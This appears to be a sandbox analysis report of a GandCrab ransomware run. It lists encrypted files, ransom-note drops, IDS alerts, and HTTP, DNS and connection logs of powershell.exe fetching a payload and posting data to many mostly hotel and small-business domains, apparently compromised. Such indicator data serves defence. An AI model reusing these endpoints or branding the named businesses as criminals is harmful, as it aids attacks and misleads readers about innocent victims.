C:\Users\admin\AppData\Roaming\Adobe\Sonar\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.myxtlhs
binary
MD5: 71f4482ad60ddabecad64bca7cb8fb0c
SHA256: 199b4bb335dc75f8dc0aed3d9483ac76a2b1e7d1b4edcfc58e9793f141801df3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy.myxtlhs
binary
MD5: 7286e276994f5f2a493f56fa0ab339c2
SHA256: 2d077428d667d4a5274f6ccb955d9326d7b15bbcf795a9babf281ad15833e120
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log.myxtlhs
binary
MD5: c3e394641aabc2a46b63475112000cd7
SHA256: 018aa38563dfbad587957f14c40ba2da26e6c9299265c35411a194f4b4229ecb
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log.myxtlhs
binary
MD5: fde9dbd2a4bed5c85e16b285aa062819
SHA256: 5aeef3277148820499c3dbaa71204f17d76e3a725262e5c2e9c22ba10bda6970
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Linguistics\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Headlights\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\J7D4H966\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\NativeCache\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.myxtlhs
binary
MD5: 70faaa883e9264b013a268e3331382c9
SHA256: bb2b887f02c6226a65a9cc2a6e05dc247b2cd74e1d1d90e9a39e5987428cb689
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.myxtlhs
binary
MD5: 43a18a5ea6ccb96c33e990d467ba5355
SHA256: efbd637d6e32dad1b33c646d34379997c7794e53b065294e84c6419245af64da
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.myxtlhs
binary
MD5: 80b1c6d373628b3de94f211c64b5fe36
SHA256: 1d4737561f92dafff6ba4a467be06b2b81f18fc14fad848db198d13c2038f137
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Forms\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.myxtlhs
binary
MD5: 0e3f5d3c40d91312fbb665b2b543e141
SHA256: b27972607ed4dbeb3e32ccbfc203542040fe52f5e58ab663083c499bdd8564ca
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.myxtlhs
binary
MD5: 345e47b0a0b8d322071bde176f468f4c
SHA256: dd7125d4f32a5d5a49cb3f871306f099be122aa876b60b159419e8488f07e4cf
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp.myxtlhs
binary
MD5: 5ac63c9aee72a72579d6a698c027363e
SHA256: fec43d0dd7306dd9e22cd057445d16c5a619d491fc58df249ebbab8fd439074c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Collab\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\.oracle_jre_usage\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5e8294.TMP
binary
MD5: 3c6a7aae234382390b6b52f47eca1baa
SHA256: c8d6bf40dc644b318b2d69e1a1cd3ec9ccfded8ade326d33cfaa2c4e3187fcd2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 3c6a7aae234382390b6b52f47eca1baa
SHA256: c8d6bf40dc644b318b2d69e1a1cd3ec9ccfded8ade326d33cfaa2c4e3187fcd2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9UVPOEWX0WIVQY1AXFJS.temp
––
MD5:  ––
SHA256:  ––
3968
notepad++.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\Config\converter.ini
text
MD5: f70f579156c93b097e656caba577a5c9
SHA256: b926498a19ca95dc28964b7336e5847107dd3c0f52c85195c135d9dd6ca402d4
3968
notepad++.exe
C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml
text
MD5: ad21a64014891793dd9b21d835278f36
SHA256: c24699c9d00abdd510140fe1b2ace97bfc70d8b21bf3462ded85afc4f73fe52f
3968
notepad++.exe
C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml
xml
MD5: 44982e1d48434c0ab3e8277e322dd1e4
SHA256: 3e661d3f1ff3977b022a0acc26b840b5e57d600bc03dcfc6befdb408c665904c
3968
notepad++.exe
C:\Users\admin\AppData\Roaming\Notepad++\langs.xml
xml
MD5: e792264bec29005b9044a435fba185ab
SHA256: 5298fd2f119c43d04f6cf831f379ec25b4156192278e40e458ec356f9b49d624

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
51
TCP/UDP connections
87
DNS requests
42
Threats
18

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
–– –– GET 200 104.17.103.175:80 http://crl.usertrust.com/AddTrustExternalCARoot.crl US
der
whitelisted
–– –– GET 200 2.16.186.41:80 http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D unknown
der
whitelisted
–– –– GET 200 2.16.186.24:80 http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D unknown
der
whitelisted
–– –– GET 200 104.17.103.175:80 http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl US
der
whitelisted
1684 powershell.exe GET 200 198.211.105.99:80 http://198.211.105.99/kasa US
text
malicious
1684 powershell.exe GET –– 78.46.77.98:80 http://www.2mmotorsport.biz/ DE
––
––
malicious
1684 powershell.exe GET 200 217.26.53.161:80 http://www.haargenau.biz/ CH
html
malicious
1684 powershell.exe POST 404 217.26.53.161:80 http://www.haargenau.biz/includes/pictures/kehethkafu.gif CH
text
html
malicious
1684 powershell.exe GET 200 74.220.215.73:80 http://www.bizziniinfissi.com/ US
html
malicious
1684 powershell.exe POST 404 74.220.215.73:80 http://www.bizziniinfissi.com/news/image/hekakehees.jpg US
text
html
malicious
1684 powershell.exe GET 200 136.243.13.215:80 http://www.holzbock.biz/ DE
html
malicious
1684 powershell.exe POST 510 136.243.13.215:80 http://www.holzbock.biz/news/pics/zuimamso.jpg DE
text
html
malicious
1684 powershell.exe GET 301 109.234.38.95:80 http://www.fliptray.biz/ RU
html
malicious
1684 powershell.exe GET 302 192.185.159.253:80 http://www.pizcam.com/ US
––
––
malicious
1684 powershell.exe GET 301 83.138.82.107:80 http://www.swisswellness.com/ DE
––
––
malicious
1684 powershell.exe GET –– 212.59.186.61:80 http://www.hotelweisshorn.com/ CH
––
––
malicious
1684 powershell.exe POST 404 212.59.186.61:80 http://www.hotelweisshorn.com/static/images/kazuamse.png CH
text
html
malicious
1684 powershell.exe GET –– 83.166.138.7:80 http://www.whitepod.com/ CH
––
––
malicious
1684 powershell.exe POST 301 83.166.138.7:80 http://www.whitepod.com/news/pics/medakeames.png CH
text
––
––
malicious
1684 powershell.exe GET 301 69.16.175.10:80 http://www.hardrockhoteldavos.com/ US
html
malicious
1684 powershell.exe GET 301 104.24.23.22:80 http://www.belvedere-locarno.com/ US
––
––
malicious
1684 powershell.exe GET 301 80.244.187.247:80 http://www.hotelfarinet.com/ GB
––
––
malicious
1684 powershell.exe GET –– 217.26.53.37:80 http://www.hrk-ramoz.com/ CH
––
––
malicious
1684 powershell.exe POST 404 217.26.53.37:80 http://www.hrk-ramoz.com/includes/image/kethhe.png CH
text
xml
malicious
1684 powershell.exe GET 301 212.59.186.61:80 http://www.morcote-residenza.com/ CH
––
––
malicious
1684 powershell.exe GET 301 136.243.162.140:80 http://www.seitensprungzimmer24.com/ DE
html
malicious
1684 powershell.exe GET 200 205.185.216.42:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab US
compressed
whitelisted
1684 powershell.exe GET 200 205.185.216.42:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D1CC8D4F82A4.crt US
der
whitelisted
1684 powershell.exe GET 302 213.186.33.5:80 http://www.arbezie-hotel.com/ FR
html
malicious
1684 powershell.exe GET 404 213.186.33.50:80 http://www.arbezie.com/includes/graphic/dahees.bmp FR
html
suspicious
1684 powershell.exe GET –– 217.26.55.5:80 http://www.aubergemontblanc.com/ CH
––
––
malicious
1684 powershell.exe POST –– 217.26.55.5:80 http://www.aubergemontblanc.com/wp-content/assets/memeimde.jpg CH
text
––
––
malicious
1684 powershell.exe GET 200 93.88.241.198:80 http://www.torhotel.com/ CH
html
malicious
1684 powershell.exe POST 404 93.88.241.198:80 http://www.torhotel.com/static/image/eszume.png CH
text
html
malicious
1684 powershell.exe GET 301 83.137.114.198:80 http://www.alpenlodge.com/ AT
––
––
malicious
1684 powershell.exe GET 301 79.170.40.230:80 http://www.aparthotelzurich.com/ GB
html
malicious
1684 powershell.exe GET 301 199.34.228.70:80 http://www.bnbdelacolline.com/ US
html
malicious
1684 powershell.exe GET 301 80.74.144.93:80 http://www.elite-hotel.com/ CH
html
malicious
1684 powershell.exe GET 302 213.186.33.17:80 http://www.bristol-adelboden.com/ FR
html
malicious
1684 powershell.exe GET 301 94.126.23.52:80 http://www.nationalzermatt.com/ CH
html
malicious
1684 powershell.exe GET –– 185.230.62.161:80 http://www.waageglarus.com/ unknown
––
––
malicious
1684 powershell.exe POST 403 185.230.62.161:80 http://www.waageglarus.com/news/assets/imheim.bmp unknown
text
html
malicious
1684 powershell.exe GET 200 192.185.85.119:80 http://www.limmathof.com/ US
html
malicious
1684 powershell.exe POST 404 192.185.85.119:80 http://www.limmathof.com/content/pictures/theska.bmp US
text
html
malicious
1684 powershell.exe GET 301 217.26.60.27:80 http://www.apartmenthaus.com/ CH
html
malicious
1684 powershell.exe GET 301 80.74.145.65:80 http://www.berginsel.com/ CH
––
––
malicious
1684 powershell.exe GET 301 52.215.91.247:80 http://www.chambre-d-hote-chez-fleury.com/ IE
––
––
malicious
1684 powershell.exe GET 301 52.215.91.247:80 http://www.hotel-blumental.com/ IE
––
––
malicious
1684 powershell.exe GET 302 31.13.92.36:80 http://www.facebook.com/ IE
––
––
whitelisted
1684 powershell.exe GET –– 173.212.202.129:80 http://www.la-fontaine.com/ DE
––
––
malicious
1684 powershell.exe POST –– 173.212.202.129:80 http://www.la-fontaine.com/data/imgs/hedeamth.jpg DE
text
––
––
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3116 gup.exe 37.59.28.236:443 OVH SAS FR whitelisted
–– –– 2.16.186.41:80 Akamai International B.V. –– whitelisted
–– –– 104.17.103.175:80 Cloudflare Inc US shared
–– –– 2.16.186.24:80 Akamai International B.V. –– whitelisted
1684 powershell.exe 198.211.105.99:80 Digital Ocean, Inc. US malicious
1684 powershell.exe 78.46.77.98:80 Hetzner Online GmbH DE suspicious
1684 powershell.exe 78.46.77.98:443 Hetzner Online GmbH DE suspicious
1684 powershell.exe 217.26.53.161:80 Hostpoint AG CH malicious
1684 powershell.exe 74.220.215.73:80 Unified Layer US malicious
1684 powershell.exe 136.243.13.215:80 Hetzner Online GmbH DE suspicious
1684 powershell.exe 109.234.38.95:80 Webzilla B.V. RU unknown
1684 powershell.exe 109.234.38.95:443 Webzilla B.V. RU unknown
1684 powershell.exe 192.185.159.253:80 CyrusOne LLC US malicious
1684 powershell.exe 192.185.159.253:443 CyrusOne LLC US malicious
1684 powershell.exe 83.138.82.107:80 hostNET Medien GmbH DE suspicious
1684 powershell.exe 83.138.82.107:443 hostNET Medien GmbH DE suspicious
1684 powershell.exe 212.59.186.61:80 green.ch AG CH malicious
1684 powershell.exe 83.166.138.7:80 Infomaniak Network SA CH malicious
1684 powershell.exe 83.166.138.7:443 Infomaniak Network SA CH malicious
1684 powershell.exe 69.16.175.10:80 Highwinds Network Group, Inc. US suspicious
1684 powershell.exe 69.16.175.10:443 Highwinds Network Group, Inc. US suspicious
1684 powershell.exe 104.24.23.22:80 Cloudflare Inc US malicious
1684 powershell.exe 104.24.23.22:443 Cloudflare Inc US malicious
1684 powershell.exe 80.244.187.247:80 UKfastnet Ltd GB suspicious
1684 powershell.exe 80.244.187.247:443 UKfastnet Ltd GB suspicious
1684 powershell.exe 217.26.53.37:80 Hostpoint AG CH suspicious
1684 powershell.exe 212.59.186.61:443 green.ch AG CH malicious
1684 powershell.exe 136.243.162.140:80 Hetzner Online GmbH DE suspicious
1684 powershell.exe 136.243.162.140:443 Hetzner Online GmbH DE suspicious
1684 powershell.exe 205.185.216.42:80 Highwinds Network Group, Inc. US whitelisted
1684 powershell.exe 213.186.33.5:80 OVH SAS FR malicious
1684 powershell.exe 213.186.33.5:443 OVH SAS FR malicious
1684 powershell.exe 213.186.33.50:80 OVH SAS FR suspicious
1684 powershell.exe 217.26.55.5:80 Hostpoint AG CH suspicious
1684 powershell.exe 93.88.241.198:80 Infomaniak Network SA CH malicious
1684 powershell.exe 83.137.114.198:80 Nessus GmbH AT malicious
1684 powershell.exe 83.137.114.198:443 Nessus GmbH AT malicious
1684 powershell.exe 79.170.40.230:80 Host Europe GmbH GB suspicious
1684 powershell.exe 79.170.40.230:443 Host Europe GmbH GB suspicious
1684 powershell.exe 199.34.228.70:80 Weebly, Inc. US malicious
1684 powershell.exe 199.34.228.70:443 Weebly, Inc. US malicious
1684 powershell.exe 80.74.144.93:80 METANET AG CH malicious
1684 powershell.exe 80.74.144.93:443 METANET AG CH malicious
1684 powershell.exe 213.186.33.17:80 OVH SAS FR malicious
1684 powershell.exe 213.186.33.17:443 OVH SAS FR malicious
1684 powershell.exe 94.126.23.52:80 METANET AG CH suspicious
1684 powershell.exe 94.126.23.52:443 METANET AG CH suspicious
1684 powershell.exe 185.230.62.161:80 –– malicious
1684 powershell.exe 192.185.85.119:80 CyrusOne LLC US suspicious
1684 powershell.exe 217.26.60.27:80 Hostpoint AG CH suspicious
1684 powershell.exe 217.26.60.27:443 Hostpoint AG CH suspicious
1684 powershell.exe 80.74.145.65:80 METANET AG CH malicious
1684 powershell.exe 80.74.145.65:443 METANET AG CH malicious
1684 powershell.exe 52.215.91.247:80 Amazon.com, Inc. IE suspicious
1684 powershell.exe 52.215.91.247:443 Amazon.com, Inc. IE suspicious
1684 powershell.exe 31.13.92.36:80 Facebook, Inc. IE whitelisted
1684 powershell.exe 31.13.92.36:443 Facebook, Inc. IE whitelisted
1684 powershell.exe 173.212.202.129:80 Contabo GmbH DE suspicious

DNS requests

Domain IP Reputation
notepad-plus-plus.org 37.59.28.236
whitelisted
ocsp.usertrust.com 2.16.186.41
2.16.186.24
whitelisted
crl.usertrust.com 104.17.103.175
104.17.105.175
104.17.104.175
104.17.102.175
104.17.106.175
whitelisted
www.2mmotorsport.biz 78.46.77.98
malicious
www.haargenau.biz 217.26.53.161
malicious
www.bizziniinfissi.com 74.220.215.73
malicious
www.holzbock.biz 136.243.13.215
malicious
www.fliptray.biz 109.234.38.95
malicious
www.pizcam.com 192.185.159.253
malicious
www.swisswellness.com 83.138.82.107
malicious
www.hotelweisshorn.com 212.59.186.61
malicious
www.whitepod.com 83.166.138.7
malicious
www.hardrockhoteldavos.com 69.16.175.10
69.16.175.42
malicious
www.belvedere-locarno.com 104.24.23.22
104.24.22.22
malicious
www.hotelfarinet.com 80.244.187.247
malicious
www.hrk-ramoz.com 217.26.53.37
malicious
www.morcote-residenza.com 212.59.186.61
malicious
www.seitensprungzimmer24.com 136.243.162.140
malicious
www.download.windowsupdate.com 205.185.216.42
205.185.216.10
205.185.216.10
205.185.216.10
whitelisted
seitensprungzimmer24.com 136.243.162.140
malicious
www.arbezie-hotel.com 213.186.33.5
malicious
www.arbezie.com 213.186.33.50
suspicious
www.aubergemontblanc.com 217.26.55.5
malicious
www.torhotel.com 93.88.241.198
malicious
www.alpenlodge.com 83.137.114.198
malicious
www.aparthotelzurich.com 79.170.40.230
malicious
www.bnbdelacolline.com 199.34.228.70
malicious
www.elite-hotel.com 80.74.144.93
malicious
elite-hotel.com 80.74.144.93
malicious
www.bristol-adelboden.com 213.186.33.17
malicious
www.nationalzermatt.com 94.126.23.52
malicious
www.hotelnationalzermatt.ch 94.126.23.52
malicious
www.nationalzermatt.ch 94.126.23.52
malicious
nationalzermatt.ch 94.126.23.52
malicious
www.waageglarus.com 185.230.62.161
malicious
www.limmathof.com 192.185.85.119
malicious
www.apartmenthaus.com 217.26.60.27
malicious
www.berginsel.com 80.74.145.65
malicious
www.chambre-d-hote-chez-fleury.com 52.215.91.247
52.31.243.111
malicious
www.hotel-blumental.com 52.215.91.247
52.31.243.111
malicious
www.facebook.com 31.13.92.36
whitelisted
www.la-fontaine.com 173.212.202.129
malicious

Threats

PID Process Class Message
1684 powershell.exe A Network Trojan was detected SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1684 powershell.exe A Network Trojan was detected ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (gif)
1684 powershell.exe A Network Trojan was detected ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (jpg)
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (jpg)
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (jpg)
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity

Debug output strings

Process Message
notepad++.exe 42C4C5846BB675C74E2B2C90C69AB44366401093
notepad++.exe 42C4C5846BB675C74E2B2C90C69AB44366401093
notepad++.exe 42C4C5846BB675C74E2B2C90C69AB44366401093